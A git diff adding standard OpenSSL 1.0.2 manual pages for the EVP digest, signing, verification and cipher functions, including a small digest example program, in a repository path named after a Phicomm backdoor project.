+ #define EVP_MD_CTX_type(e)		EVP_MD_type((e)->digest)
+
+ const EVP_MD *EVP_md_null(void);
+ const EVP_MD *EVP_md2(void);
+ const EVP_MD *EVP_md5(void);
+ const EVP_MD *EVP_sha(void);
+ const EVP_MD *EVP_sha1(void);
+ const EVP_MD *EVP_dss(void);
+ const EVP_MD *EVP_dss1(void);
+ const EVP_MD *EVP_mdc2(void);
+ const EVP_MD *EVP_ripemd160(void);
+
+ const EVP_MD *EVP_sha224(void);
+ const EVP_MD *EVP_sha256(void);
+ const EVP_MD *EVP_sha384(void);
+ const EVP_MD *EVP_sha512(void);
+
+ const EVP_MD *EVP_get_digestbyname(const char *name);
+ #define EVP_get_digestbynid(a) EVP_get_digestbyname(OBJ_nid2sn(a))
+ #define EVP_get_digestbyobj(a) EVP_get_digestbynid(OBJ_obj2nid(a))
+
+=head1 DESCRIPTION
+
+The EVP digest routines are a high level interface to message digests.
+
+EVP_MD_CTX_init() initializes digest context B<ctx>.
+
+EVP_MD_CTX_create() allocates, initializes and returns a digest context.
+
+EVP_DigestInit_ex() sets up digest context B<ctx> to use a digest
+B<type> from ENGINE B<impl>. B<ctx> must be initialized before calling this
+function. B<type> will typically be supplied by a functionsuch as EVP_sha1().
+If B<impl> is NULL then the default implementation of digest B<type> is used.
+
+EVP_DigestUpdate() hashes B<cnt> bytes of data at B<d> into the
+digest context B<ctx>. This function can be called several times on the
+same B<ctx> to hash additional data.
+
+EVP_DigestFinal_ex() retrieves the digest value from B<ctx> and places
+it in B<md>. If the B<s> parameter is not NULL then the number of
+bytes of data written (i.e. the length of the digest) will be written
+to the integer at B<s>, at most B<EVP_MAX_MD_SIZE> bytes will be written.
+After calling EVP_DigestFinal_ex() no additional calls to EVP_DigestUpdate()
+can be made, but EVP_DigestInit_ex() can be called to initialize a new
+digest operation.
+
+EVP_MD_CTX_cleanup() cleans up digest context B<ctx>, it should be called
+after a digest context is no longer needed.
+
+EVP_MD_CTX_destroy() cleans up digest context B<ctx> and frees up the
+space allocated to it, it should be called only on a context created
+using EVP_MD_CTX_create().
+
+EVP_MD_CTX_copy_ex() can be used to copy the message digest state from
+B<in> to B<out>. This is useful if large amounts of data are to be
+hashed which only differ in the last few bytes. B<out> must be initialized
+before calling this function.
+
+EVP_DigestInit() behaves in the same way as EVP_DigestInit_ex() except
+the passed context B<ctx> does not have to be initialized, and it always
+uses the default digest implementation.
+
+EVP_DigestFinal() is similar to EVP_DigestFinal_ex() except the digest
+context B<ctx> is automatically cleaned up.
+
+EVP_MD_CTX_copy() is similar to EVP_MD_CTX_copy_ex() except the destination
+B<out> does not have to be initialized.
+
+EVP_MD_size() and EVP_MD_CTX_size() return the size of the message digest
+when passed an B<EVP_MD> or an B<EVP_MD_CTX> structure, i.e. the size of the
+hash.
+
+EVP_MD_block_size() and EVP_MD_CTX_block_size() return the block size of the
+message digest when passed an B<EVP_MD> or an B<EVP_MD_CTX> structure.
+
+EVP_MD_type() and EVP_MD_CTX_type() return the NID of the OBJECT IDENTIFIER
+representing the given message digest when passed an B<EVP_MD> structure.
+For example EVP_MD_type(EVP_sha1()) returns B<NID_sha1>. This function is
+normally used when setting ASN1 OIDs.
+
+EVP_MD_CTX_md() returns the B<EVP_MD> structure corresponding to the passed
+B<EVP_MD_CTX>.
+
+EVP_MD_pkey_type() returns the NID of the public key signing algorithm associated
+with this digest. For example EVP_sha1() is associated with RSA so this will
+return B<NID_sha1WithRSAEncryption>. Since digests and signature algorithms
+are no longer linked this function is only retained for compatibility
+reasons.
+
+EVP_md2(), EVP_md5(), EVP_sha(), EVP_sha1(), EVP_sha224(), EVP_sha256(),
+EVP_sha384(), EVP_sha512(), EVP_mdc2() and EVP_ripemd160() return B<EVP_MD>
+structures for the MD2, MD5, SHA, SHA1, SHA224, SHA256, SHA384, SHA512, MDC2
+and RIPEMD160 digest algorithms respectively.
+
+EVP_dss() and EVP_dss1() return B<EVP_MD> structures for SHA and SHA1 digest
+algorithms but using DSS (DSA) for the signature algorithm. Note: there is
+no need to use these pseudo-digests in OpenSSL 1.0.0 and later, they are
+however retained for compatibility.
+
+EVP_md_null() is a "null" message digest that does nothing: i.e. the hash it
+returns is of zero length.
+
+EVP_get_digestbyname(), EVP_get_digestbynid() and EVP_get_digestbyobj()
+return an B<EVP_MD> structure when passed a digest name, a digest NID or
+an ASN1_OBJECT structure respectively. The digest table must be initialized
+using, for example, OpenSSL_add_all_digests() for these functions to work.
+
+=head1 RETURN VALUES
+
+EVP_DigestInit_ex(), EVP_DigestUpdate() and EVP_DigestFinal_ex() return 1 for
+success and 0 for failure.
+
+EVP_MD_CTX_copy_ex() returns 1 if successful or 0 for failure.
+
+EVP_MD_type(), EVP_MD_pkey_type() and EVP_MD_type() return the NID of the
+corresponding OBJECT IDENTIFIER or NID_undef if none exists.
+
+EVP_MD_size(), EVP_MD_block_size(), EVP_MD_CTX_size() and
+EVP_MD_CTX_block_size() return the digest or block size in bytes.
+
+EVP_md_null(), EVP_md2(), EVP_md5(), EVP_sha(), EVP_sha1(), EVP_dss(),
+EVP_dss1(), EVP_mdc2() and EVP_ripemd160() return pointers to the
+corresponding EVP_MD structures.
+
+EVP_get_digestbyname(), EVP_get_digestbynid() and EVP_get_digestbyobj()
+return either an B<EVP_MD> structure or NULL if an error occurs.
+
+=head1 NOTES
+
+The B<EVP> interface to message digests should almost always be used in
+preference to the low level interfaces. This is because the code then becomes
+transparent to the digest used and much more flexible.
+
+New applications should use the SHA2 digest algorithms such as SHA256.
+The other digest algorithms are still in common use.
+
+For most applications the B<impl> parameter to EVP_DigestInit_ex() will be
+set to NULL to use the default digest implementation.
+
+The functions EVP_DigestInit(), EVP_DigestFinal() and EVP_MD_CTX_copy() are
+obsolete but are retained to maintain compatibility with existing code. New
+applications should use EVP_DigestInit_ex(), EVP_DigestFinal_ex() and
+EVP_MD_CTX_copy_ex() because they can efficiently reuse a digest context
+instead of initializing and cleaning it up on each call and allow non default
+implementations of digests to be specified.
+
+In OpenSSL 0.9.7 and later if digest contexts are not cleaned up after use
+memory leaks will occur.
+
+Stack allocation of EVP_MD_CTX structures is common, for example:
+
+ EVP_MD_CTX mctx;
+ EVP_MD_CTX_init(&mctx);
+
+This will cause binary compatibility issues if the size of EVP_MD_CTX
+structure changes (this will only happen with a major release of OpenSSL).
+Applications wishing to avoid this should use EVP_MD_CTX_create() instead:
+
+ EVP_MD_CTX *mctx;
+ mctx = EVP_MD_CTX_create();
+
+
+=head1 EXAMPLE
+
+This example digests the data "Test Message\n" and "Hello World\n", using the
+digest name passed on the command line.
+
+ #include <stdio.h>
+ #include <openssl/evp.h>
+
+ main(int argc, char *argv[])
+ {
+ EVP_MD_CTX *mdctx;
+ const EVP_MD *md;
+ char mess1[] = "Test Message\n";
+ char mess2[] = "Hello World\n";
+ unsigned char md_value[EVP_MAX_MD_SIZE];
+ int md_len, i;
+
+ OpenSSL_add_all_digests();
+
+ if(!argv[1]) {
+ 	printf("Usage: mdtest digestname\n");
+	exit(1);
+ }
+
+ md = EVP_get_digestbyname(argv[1]);
+
+ if(!md) {
+ 	printf("Unknown message digest %s\n", argv[1]);
+	exit(1);
+ }
+
+ mdctx = EVP_MD_CTX_create();
+ EVP_DigestInit_ex(mdctx, md, NULL);
+ EVP_DigestUpdate(mdctx, mess1, strlen(mess1));
+ EVP_DigestUpdate(mdctx, mess2, strlen(mess2));
+ EVP_DigestFinal_ex(mdctx, md_value, &md_len);
+ EVP_MD_CTX_destroy(mdctx);
+
+ printf("Digest is: ");
+ for(i = 0; i < md_len; i++)
+ 	printf("%02x", md_value[i]);
+ printf("\n");
+
+ /* Call this once before exit. */
+ EVP_cleanup();
+ exit(0);
+ }
+
+=head1 SEE ALSO
+
+L<dgst(1)|dgst(1)>,
+L<evp(3)|evp(3)>
+
+=head1 HISTORY
+
+EVP_DigestInit(), EVP_DigestUpdate() and EVP_DigestFinal() are
+available in all versions of SSLeay and OpenSSL.
+
+EVP_MD_CTX_init(), EVP_MD_CTX_create(), EVP_MD_CTX_copy_ex(),
+EVP_MD_CTX_cleanup(), EVP_MD_CTX_destroy(), EVP_DigestInit_ex()
+and EVP_DigestFinal_ex() were added in OpenSSL 0.9.7.
+
+EVP_md_null(), EVP_md2(), EVP_md5(), EVP_sha(), EVP_sha1(),
+EVP_dss(), EVP_dss1(), EVP_mdc2() and EVP_ripemd160() were
+changed to return truly const EVP_MD * in OpenSSL 0.9.7.
+
+The link between digests and signing algorithms was fixed in OpenSSL 1.0 and
+later, so now EVP_sha1() can be used with RSA and DSA; there is no need to
+use EVP_dss1() any more.
+
+OpenSSL 1.0 and later does not include the MD2 digest algorithm in the
+default configuration due to its security weaknesses.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_DigestSignInit.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_DigestSignInit.pod
new file mode 100644
index 0000000..37d960e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_DigestSignInit.pod
@@ -0,0 +1,87 @@
+=pod
+
+=head1 NAME
+
+EVP_DigestSignInit, EVP_DigestSignUpdate, EVP_DigestSignFinal - EVP signing functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_DigestSignInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
+			const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
+ int EVP_DigestSignUpdate(EVP_MD_CTX *ctx, const void *d, unsigned int cnt);
+ int EVP_DigestSignFinal(EVP_MD_CTX *ctx, unsigned char *sig, size_t *siglen);
+
+=head1 DESCRIPTION
+
+The EVP signature routines are a high level interface to digital signatures.
+
+EVP_DigestSignInit() sets up signing context B<ctx> to use digest B<type> from
+ENGINE B<impl> and private key B<pkey>. B<ctx> must be initialized with
+EVP_MD_CTX_init() before calling this function. If B<pctx> is not NULL the
+EVP_PKEY_CTX of the signing operation will be written to B<*pctx>: this can
+be used to set alternative signing options.
+
+EVP_DigestSignUpdate() hashes B<cnt> bytes of data at B<d> into the
+signature context B<ctx>. This function can be called several times on the
+same B<ctx> to include additional data. This function is currently implemented
+usig a macro.
+
+EVP_DigestSignFinal() signs the data in B<ctx> places the signature in B<sig>.
+If B<sig> is B<NULL> then the maximum size of the output buffer is written to
+the B<siglen> parameter. If B<sig> is not B<NULL> then before the call the
+B<siglen> parameter should contain the length of the B<sig> buffer, if the
+call is successful the signature is written to B<sig> and the amount of data
+written to B<siglen>.
+
+=head1 RETURN VALUES
+
+EVP_DigestSignInit() EVP_DigestSignUpdate() and EVP_DigestSignaFinal() return
+1 for success and 0 or a negative value for failure. In particular a return
+value of -2 indicates the operation is not supported by the public key
+algorithm.
+
+The error codes can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 NOTES
+
+The B<EVP> interface to digital signatures should almost always be used in
+preference to the low level interfaces. This is because the code then becomes
+transparent to the algorithm used and much more flexible.
+
+In previous versions of OpenSSL there was a link between message digest types
+and public key algorithms. This meant that "clone" digests such as EVP_dss1()
+needed to be used to sign using SHA1 and DSA. This is no longer necessary and
+the use of clone digest is now discouraged.
+
+For some key types and parameters the random number generator must be seeded
+or the operation will fail. 
+
+The call to EVP_DigestSignFinal() internally finalizes a copy of the digest
+context. This means that calls to EVP_DigestSignUpdate() and
+EVP_DigestSignFinal() can be called later to digest and sign additional data.
+
+Since only a copy of the digest context is ever finalized the context must
+be cleaned up after use by calling EVP_MD_CTX_cleanup() or a memory leak
+will occur.
+
+The use of EVP_PKEY_size() with these functions is discouraged because some
+signature operations may have a signature length which depends on the
+parameters set. As a result EVP_PKEY_size() would have to return a value
+which indicates the maximum possible signature for any set of parameters.
+
+=head1 SEE ALSO
+
+L<EVP_DigestVerifyInit(3)|EVP_DigestVerifyInit(3)>,
+L<EVP_DigestInit(3)|EVP_DigestInit(3)>, L<err(3)|err(3)>,
+L<evp(3)|evp(3)>, L<hmac(3)|hmac(3)>, L<md2(3)|md2(3)>,
+L<md5(3)|md5(3)>, L<mdc2(3)|mdc2(3)>, L<ripemd(3)|ripemd(3)>,
+L<sha(3)|sha(3)>, L<dgst(1)|dgst(1)>
+
+=head1 HISTORY
+
+EVP_DigestSignInit(), EVP_DigestSignUpdate() and EVP_DigestSignFinal() 
+were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_DigestVerifyInit.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_DigestVerifyInit.pod
new file mode 100644
index 0000000..e0217e4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_DigestVerifyInit.pod
@@ -0,0 +1,82 @@
+=pod
+
+=head1 NAME
+
+EVP_DigestVerifyInit, EVP_DigestVerifyUpdate, EVP_DigestVerifyFinal - EVP signature verification functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ int EVP_DigestVerifyInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
+			const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
+ int EVP_DigestVerifyUpdate(EVP_MD_CTX *ctx, const void *d, unsigned int cnt);
+ int EVP_DigestVerifyFinal(EVP_MD_CTX *ctx, const unsigned char *sig, size_t siglen);
+
+=head1 DESCRIPTION
+
+The EVP signature routines are a high level interface to digital signatures.
+
+EVP_DigestVerifyInit() sets up verification context B<ctx> to use digest
+B<type> from ENGINE B<impl> and public key B<pkey>. B<ctx> must be initialized
+with EVP_MD_CTX_init() before calling this function. If B<pctx> is not NULL the
+EVP_PKEY_CTX of the verification operation will be written to B<*pctx>: this
+can be used to set alternative verification options.
+
+EVP_DigestVerifyUpdate() hashes B<cnt> bytes of data at B<d> into the
+verification context B<ctx>. This function can be called several times on the
+same B<ctx> to include additional data. This function is currently implemented
+using a macro.
+
+EVP_DigestVerifyFinal() verifies the data in B<ctx> against the signature in
+B<sig> of length B<siglen>.
+
+=head1 RETURN VALUES
+
+EVP_DigestVerifyInit() and EVP_DigestVerifyUpdate() return 1 for success and 0
+or a negative value for failure. In particular a return value of -2 indicates
+the operation is not supported by the public key algorithm.
+
+Unlike other functions the return value 0 from EVP_DigestVerifyFinal() only
+indicates that the signature did not verify successfully (that is tbs did
+not match the original data or the signature was of invalid form) it is not an
+indication of a more serious error.
+
+The error codes can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 NOTES
+
+The B<EVP> interface to digital signatures should almost always be used in
+preference to the low level interfaces. This is because the code then becomes
+transparent to the algorithm used and much more flexible.
+
+In previous versions of OpenSSL there was a link between message digest types
+and public key algorithms. This meant that "clone" digests such as EVP_dss1()
+needed to be used to sign using SHA1 and DSA. This is no longer necessary and
+the use of clone digest is now discouraged.
+
+For some key types and parameters the random number generator must be seeded
+or the operation will fail. 
+
+The call to EVP_DigestVerifyFinal() internally finalizes a copy of the digest
+context. This means that EVP_VerifyUpdate() and EVP_VerifyFinal() can
+be called later to digest and verify additional data.
+
+Since only a copy of the digest context is ever finalized the context must
+be cleaned up after use by calling EVP_MD_CTX_cleanup() or a memory leak
+will occur.
+
+=head1 SEE ALSO
+
+L<EVP_DigestSignInit(3)|EVP_DigestSignInit(3)>,
+L<EVP_DigestInit(3)|EVP_DigestInit(3)>, L<err(3)|err(3)>,
+L<evp(3)|evp(3)>, L<hmac(3)|hmac(3)>, L<md2(3)|md2(3)>,
+L<md5(3)|md5(3)>, L<mdc2(3)|mdc2(3)>, L<ripemd(3)|ripemd(3)>,
+L<sha(3)|sha(3)>, L<dgst(1)|dgst(1)>
+
+=head1 HISTORY
+
+EVP_DigestVerifyInit(), EVP_DigestVerifyUpdate() and EVP_DigestVerifyFinal() 
+were first added to OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_EncryptInit.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_EncryptInit.pod
new file mode 100644
index 0000000..fb6036f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/EVP_EncryptInit.pod
@@ -0,0 +1,593 @@
+=pod
+
+=head1 NAME
+
+EVP_CIPHER_CTX_init, EVP_EncryptInit_ex, EVP_EncryptUpdate,
+EVP_EncryptFinal_ex, EVP_DecryptInit_ex, EVP_DecryptUpdate,
+EVP_DecryptFinal_ex, EVP_CipherInit_ex, EVP_CipherUpdate,
+EVP_CipherFinal_ex, EVP_CIPHER_CTX_set_key_length,
+EVP_CIPHER_CTX_ctrl, EVP_CIPHER_CTX_cleanup, EVP_EncryptInit,
+EVP_EncryptFinal, EVP_DecryptInit, EVP_DecryptFinal,
+EVP_CipherInit, EVP_CipherFinal, EVP_get_cipherbyname,
+EVP_get_cipherbynid, EVP_get_cipherbyobj, EVP_CIPHER_nid,
+EVP_CIPHER_block_size, EVP_CIPHER_key_length, EVP_CIPHER_iv_length,
+EVP_CIPHER_flags, EVP_CIPHER_mode, EVP_CIPHER_type, EVP_CIPHER_CTX_cipher,
+EVP_CIPHER_CTX_nid, EVP_CIPHER_CTX_block_size, EVP_CIPHER_CTX_key_length,
+EVP_CIPHER_CTX_iv_length, EVP_CIPHER_CTX_get_app_data,
+EVP_CIPHER_CTX_set_app_data, EVP_CIPHER_CTX_type, EVP_CIPHER_CTX_flags,
+EVP_CIPHER_CTX_mode, EVP_CIPHER_param_to_asn1, EVP_CIPHER_asn1_to_param,
+EVP_CIPHER_CTX_set_padding,  EVP_enc_null, EVP_des_cbc, EVP_des_ecb,
+EVP_des_cfb, EVP_des_ofb, EVP_des_ede_cbc, EVP_des_ede, EVP_des_ede_ofb,
+EVP_des_ede_cfb, EVP_des_ede3_cbc, EVP_des_ede3, EVP_des_ede3_ofb,
+EVP_des_ede3_cfb, EVP_desx_cbc, EVP_rc4, EVP_rc4_40, EVP_idea_cbc,
+EVP_idea_ecb, EVP_idea_cfb, EVP_idea_ofb, EVP_idea_cbc, EVP_rc2_cbc,
+EVP_rc2_ecb, EVP_rc2_cfb, EVP_rc2_ofb, EVP_rc2_40_cbc, EVP_rc2_64_cbc,
+EVP_bf_cbc, EVP_bf_ecb, EVP_bf_cfb, EVP_bf_ofb, EVP_cast5_cbc,
+EVP_cast5_ecb, EVP_cast5_cfb, EVP_cast5_ofb, EVP_rc5_32_12_16_cbc,
+EVP_rc5_32_12_16_ecb, EVP_rc5_32_12_16_cfb, EVP_rc5_32_12_16_ofb, 
+EVP_aes_128_gcm, EVP_aes_192_gcm, EVP_aes_256_gcm, EVP_aes_128_ccm,
+EVP_aes_192_ccm, EVP_aes_256_ccm - EVP cipher routines
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+ void EVP_CIPHER_CTX_init(EVP_CIPHER_CTX *a);
+
+ int EVP_EncryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+	 ENGINE *impl, unsigned char *key, unsigned char *iv);
+ int EVP_EncryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out,
+         int *outl, unsigned char *in, int inl);
+ int EVP_EncryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *out,
+         int *outl);
+
+ int EVP_DecryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+	 ENGINE *impl, unsigned char *key, unsigned char *iv);
+ int EVP_DecryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out,
+         int *outl, unsigned char *in, int inl);
+ int EVP_DecryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *outm,
+         int *outl);
+
+ int EVP_CipherInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+         ENGINE *impl, unsigned char *key, unsigned char *iv, int enc);
+ int EVP_CipherUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out,
+         int *outl, unsigned char *in, int inl);
+ int EVP_CipherFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *outm,
+         int *outl);
+
+ int EVP_EncryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+         unsigned char *key, unsigned char *iv);
+ int EVP_EncryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *out,
+         int *outl);
+
+ int EVP_DecryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+         unsigned char *key, unsigned char *iv);
+ int EVP_DecryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *outm,
+         int *outl);
+
+ int EVP_CipherInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+         unsigned char *key, unsigned char *iv, int enc);
+ int EVP_CipherFinal(EVP_CIPHER_CTX *ctx, unsigned char *outm,
+         int *outl);
+
+ int EVP_CIPHER_CTX_set_padding(EVP_CIPHER_CTX *x, int padding);
+ int EVP_CIPHER_CTX_set_key_length(EVP_CIPHER_CTX *x, int keylen);
+ int EVP_CIPHER_CTX_ctrl(EVP_CIPHER_CTX *ctx, int type, int arg, void *ptr);
+ int EVP_CIPHER_CTX_cleanup(EVP_CIPHER_CTX *a);
+
+ const EVP_CIPHER *EVP_get_cipherbyname(const char *name);
+ #define EVP_get_cipherbynid(a) EVP_get_cipherbyname(OBJ_nid2sn(a))
+ #define EVP_get_cipherbyobj(a) EVP_get_cipherbynid(OBJ_obj2nid(a))
+
+ #define EVP_CIPHER_nid(e)		((e)->nid)
+ #define EVP_CIPHER_block_size(e)	((e)->block_size)
+ #define EVP_CIPHER_key_length(e)	((e)->key_len)
+ #define EVP_CIPHER_iv_length(e)		((e)->iv_len)
+ #define EVP_CIPHER_flags(e)		((e)->flags)
+ #define EVP_CIPHER_mode(e)		((e)->flags) & EVP_CIPH_MODE)
+ int EVP_CIPHER_type(const EVP_CIPHER *ctx);
+
+ #define EVP_CIPHER_CTX_cipher(e)	((e)->cipher)
+ #define EVP_CIPHER_CTX_nid(e)		((e)->cipher->nid)
+ #define EVP_CIPHER_CTX_block_size(e)	((e)->cipher->block_size)
+ #define EVP_CIPHER_CTX_key_length(e)	((e)->key_len)
+ #define EVP_CIPHER_CTX_iv_length(e)	((e)->cipher->iv_len)
+ #define EVP_CIPHER_CTX_get_app_data(e)	((e)->app_data)
+ #define EVP_CIPHER_CTX_set_app_data(e,d) ((e)->app_data=(char *)(d))
+ #define EVP_CIPHER_CTX_type(c)         EVP_CIPHER_type(EVP_CIPHER_CTX_cipher(c))
+ #define EVP_CIPHER_CTX_flags(e)		((e)->cipher->flags)
+ #define EVP_CIPHER_CTX_mode(e)		((e)->cipher->flags & EVP_CIPH_MODE)
+
+ int EVP_CIPHER_param_to_asn1(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
+ int EVP_CIPHER_asn1_to_param(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
+
+=head1 DESCRIPTION
+
+The EVP cipher routines are a high level interface to certain
+symmetric ciphers.
+
+EVP_CIPHER_CTX_init() initializes cipher contex B<ctx>.
+
+EVP_EncryptInit_ex() sets up cipher context B<ctx> for encryption
+with cipher B<type> from ENGINE B<impl>. B<ctx> must be initialized
+before calling this function. B<type> is normally supplied
+by a function such as EVP_des_cbc(). If B<impl> is NULL then the
+default implementation is used. B<key> is the symmetric key to use
+and B<iv> is the IV to use (if necessary), the actual number of bytes
+used for the key and IV depends on the cipher. It is possible to set
+all parameters to NULL except B<type> in an initial call and supply
+the remaining parameters in subsequent calls, all of which have B<type>
+set to NULL. This is done when the default cipher parameters are not
+appropriate.
+
+EVP_EncryptUpdate() encrypts B<inl> bytes from the buffer B<in> and
+writes the encrypted version to B<out>. This function can be called
+multiple times to encrypt successive blocks of data. The amount
+of data written depends on the block alignment of the encrypted data:
+as a result the amount of data written may be anything from zero bytes
+to (inl + cipher_block_size - 1) so B<out> should contain sufficient
+room. The actual number of bytes written is placed in B<outl>.
+
+If padding is enabled (the default) then EVP_EncryptFinal_ex() encrypts
+the "final" data, that is any data that remains in a partial block.
+It uses L<standard block padding|/NOTES> (aka PKCS padding). The encrypted
+final data is written to B<out> which should have sufficient space for
+one cipher block. The number of bytes written is placed in B<outl>. After
+this function is called the encryption operation is finished and no further
+calls to EVP_EncryptUpdate() should be made.
+
+If padding is disabled then EVP_EncryptFinal_ex() will not encrypt any more
+data and it will return an error if any data remains in a partial block:
+that is if the total data length is not a multiple of the block size. 
+
+EVP_DecryptInit_ex(), EVP_DecryptUpdate() and EVP_DecryptFinal_ex() are the
+corresponding decryption operations. EVP_DecryptFinal() will return an
+error code if padding is enabled and the final block is not correctly
+formatted. The parameters and restrictions are identical to the encryption
+operations except that if padding is enabled the decrypted data buffer B<out>
+passed to EVP_DecryptUpdate() should have sufficient room for
+(B<inl> + cipher_block_size) bytes unless the cipher block size is 1 in
+which case B<inl> bytes is sufficient.
+
+EVP_CipherInit_ex(), EVP_CipherUpdate() and EVP_CipherFinal_ex() are
+functions that can be used for decryption or encryption. The operation
+performed depends on the value of the B<enc> parameter. It should be set
+to 1 for encryption, 0 for decryption and -1 to leave the value unchanged
+(the actual value of 'enc' being supplied in a previous call).
+
+EVP_CIPHER_CTX_cleanup() clears all information from a cipher context
+and free up any allocated memory associate with it. It should be called
+after all operations using a cipher are complete so sensitive information
+does not remain in memory.
+
+EVP_EncryptInit(), EVP_DecryptInit() and EVP_CipherInit() behave in a
+similar way to EVP_EncryptInit_ex(), EVP_DecryptInit_ex and
+EVP_CipherInit_ex() except the B<ctx> parameter does not need to be
+initialized and they always use the default cipher implementation.
+
+EVP_EncryptFinal(), EVP_DecryptFinal() and EVP_CipherFinal() behave in a
+similar way to EVP_EncryptFinal_ex(), EVP_DecryptFinal_ex() and
+EVP_CipherFinal_ex() except B<ctx> is automatically cleaned up 
+after the call.
+
+EVP_get_cipherbyname(), EVP_get_cipherbynid() and EVP_get_cipherbyobj()
+return an EVP_CIPHER structure when passed a cipher name, a NID or an
+ASN1_OBJECT structure.
+
+EVP_CIPHER_nid() and EVP_CIPHER_CTX_nid() return the NID of a cipher when
+passed an B<EVP_CIPHER> or B<EVP_CIPHER_CTX> structure.  The actual NID
+value is an internal value which may not have a corresponding OBJECT
+IDENTIFIER.
+
+EVP_CIPHER_CTX_set_padding() enables or disables padding. By default
+encryption operations are padded using standard block padding and the
+padding is checked and removed when decrypting. If the B<pad> parameter
+is zero then no padding is performed, the total amount of data encrypted
+or decrypted must then be a multiple of the block size or an error will
+occur.
+
+EVP_CIPHER_key_length() and EVP_CIPHER_CTX_key_length() return the key
+length of a cipher when passed an B<EVP_CIPHER> or B<EVP_CIPHER_CTX>
+structure. The constant B<EVP_MAX_KEY_LENGTH> is the maximum key length
+for all ciphers. Note: although EVP_CIPHER_key_length() is fixed for a
+given cipher, the value of EVP_CIPHER_CTX_key_length() may be different
+for variable key length ciphers.
+
+EVP_CIPHER_CTX_set_key_length() sets the key length of the cipher ctx.
+If the cipher is a fixed length cipher then attempting to set the key
+length to any value other than the fixed value is an error.
+
+EVP_CIPHER_iv_length() and EVP_CIPHER_CTX_iv_length() return the IV
+length of a cipher when passed an B<EVP_CIPHER> or B<EVP_CIPHER_CTX>.
+It will return zero if the cipher does not use an IV.  The constant
+B<EVP_MAX_IV_LENGTH> is the maximum IV length for all ciphers.
+
+EVP_CIPHER_block_size() and EVP_CIPHER_CTX_block_size() return the block
+size of a cipher when passed an B<EVP_CIPHER> or B<EVP_CIPHER_CTX>
+structure. The constant B<EVP_MAX_IV_LENGTH> is also the maximum block
+length for all ciphers.
+
+EVP_CIPHER_type() and EVP_CIPHER_CTX_type() return the type of the passed
+cipher or context. This "type" is the actual NID of the cipher OBJECT
+IDENTIFIER as such it ignores the cipher parameters and 40 bit RC2 and
+128 bit RC2 have the same NID. If the cipher does not have an object
+identifier or does not have ASN1 support this function will return
+B<NID_undef>.
+
+EVP_CIPHER_CTX_cipher() returns the B<EVP_CIPHER> structure when passed
+an B<EVP_CIPHER_CTX> structure.
+
+EVP_CIPHER_mode() and EVP_CIPHER_CTX_mode() return the block cipher mode:
+EVP_CIPH_ECB_MODE, EVP_CIPH_CBC_MODE, EVP_CIPH_CFB_MODE or
+EVP_CIPH_OFB_MODE. If the cipher is a stream cipher then
+EVP_CIPH_STREAM_CIPHER is returned.
+
+EVP_CIPHER_param_to_asn1() sets the AlgorithmIdentifier "parameter" based
+on the passed cipher. This will typically include any parameters and an
+IV. The cipher IV (if any) must be set when this call is made. This call
+should be made before the cipher is actually "used" (before any
+EVP_EncryptUpdate(), EVP_DecryptUpdate() calls for example). This function
+may fail if the cipher does not have any ASN1 support.
+
+EVP_CIPHER_asn1_to_param() sets the cipher parameters based on an ASN1
+AlgorithmIdentifier "parameter". The precise effect depends on the cipher
+In the case of RC2, for example, it will set the IV and effective key length.
+This function should be called after the base cipher type is set but before
+the key is set. For example EVP_CipherInit() will be called with the IV and
+key set to NULL, EVP_CIPHER_asn1_to_param() will be called and finally
+EVP_CipherInit() again with all parameters except the key set to NULL. It is
+possible for this function to fail if the cipher does not have any ASN1 support
+or the parameters cannot be set (for example the RC2 effective key length
+is not supported.
+
+EVP_CIPHER_CTX_ctrl() allows various cipher specific parameters to be determined
+and set.
+
+=head1 RETURN VALUES
+
+EVP_EncryptInit_ex(), EVP_EncryptUpdate() and EVP_EncryptFinal_ex()
+return 1 for success and 0 for failure.
+
+EVP_DecryptInit_ex() and EVP_DecryptUpdate() return 1 for success and 0 for failure.
+EVP_DecryptFinal_ex() returns 0 if the decrypt failed or 1 for success.
+
